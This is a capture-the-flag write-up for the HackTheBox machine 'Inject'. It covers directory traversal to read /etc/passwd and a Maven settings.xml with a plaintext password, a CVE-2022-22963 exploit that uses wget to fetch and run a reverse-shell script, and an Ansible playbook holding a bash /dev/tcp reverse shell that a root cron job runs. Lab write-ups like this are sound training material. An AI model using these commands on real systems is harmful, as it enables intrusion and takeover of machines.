HackTheBox "Inject"

April 18th, 2023

Introduction

Inject is an easy box released on March 11th, 2023 by rajHere.

User Own

Nmap:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-17 12:14 EDT
Nmap scan report for 10.10.11.204
Host is up (0.031s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_  256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds

There is a website at 10.10.11.204:8080.

The file upload only accepts images, so nothing much there. However, GET /show_image?img= is vulnerable to directory traversal.

../../../../../../etc/passwd

/etc/passwd shows there are two users named frank and phil. phil's home directory contains the user.txt flag. frank's home directory contains an abnormal directory called .m2. .m2 contains settings.xml which has credentials.

settings.xml

<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

While we have credentials, the credentials don't work for logging into phil through SSH.

Checking /var/www/WebApp/pom.xml, the web app is using Spring Cloud 3.2.2, which is vulnerable to CVE-2022-22963. This Python script can get us a reverse shell as frank.

Terminal 1

python3 -m http.server 80

Terminal 2

python3 exploit.py 10.10.11.204:8080 'wget http://10.10.xx.xx/Documents/rev_shell.sh -O /tmp/rev_shell.sh'
[+] Host is vulnerable
[+] Command executed
[+] Exploit completed

python3 exploit.py 10.10.11.204:8080 'chmod +x /tmp/rev_shell.sh'                                
[+] Host is vulnerable
[+] Command executed
[+] Exploit completed

python3 exploit.py 10.10.11.204:8080 '/tmp/rev_shell.sh'                                                  
[+] Host is vulnerable
[+] Command executed
[+] Exploit completed

Terminal 3

nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.11.204] 45152
whoami
frank

While the password for phil won't work for SSH, we can still login to phil from frank using su phil and the password from settings.xml.

su phil
Password: DocPhillovestoInject123
whoami
phil
cd ~
cat user.txt
[USER FLAG HERE]

System Own

Inside /opt is file called automation/tasks/playbook_1.yml.

playbook_1.yml

- hosts: localhost
  tasks:
  - name: Checking webapp service
    ansible.builtin.systemd:
      name: webapp
      enabled: yes
      state: started

We can find an interesting line from pspy:

CMD: UID=0 PID=15628 | /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml

Every .yml file inside of /opt/automation/tasks is being run by ansible-parallel every 2 minutes.

/opt/automation/tasks is only writable by a group called staff.

grep staff /etc/group
staff:x:50:phil

phil is in staff, so we can put any .yml file we want in /opt/automation/tasks as phil. We can use a custom playbook that gives us a reverse shell as root. According to the Ansible docs, we can run shell code with a playbook. This Gist code will work.

playbook_custom.yml

- hosts: localhost
  tasks:
  - name: rev
    shell: bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/1234 0>&1'

Once the system runs our playbook, we get a reverse shell as root, letting us read the root.txt flag.

nc -nvlp 1234                                                                 
listening on [any] 1234 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.11.204] 56648
bash: cannot set terminal process group (17831): Inappropriate ioctl for device
bash: no job control in this shell
root@inject:/opt/automation/tasks# cat /root/root.txt
cat /root/root.txt
[ROOT FLAG HERE]

And that's the box!

PreviousHackTheBox "Investigation"NextHackTheBox "Precious"

Last updated 2 years ago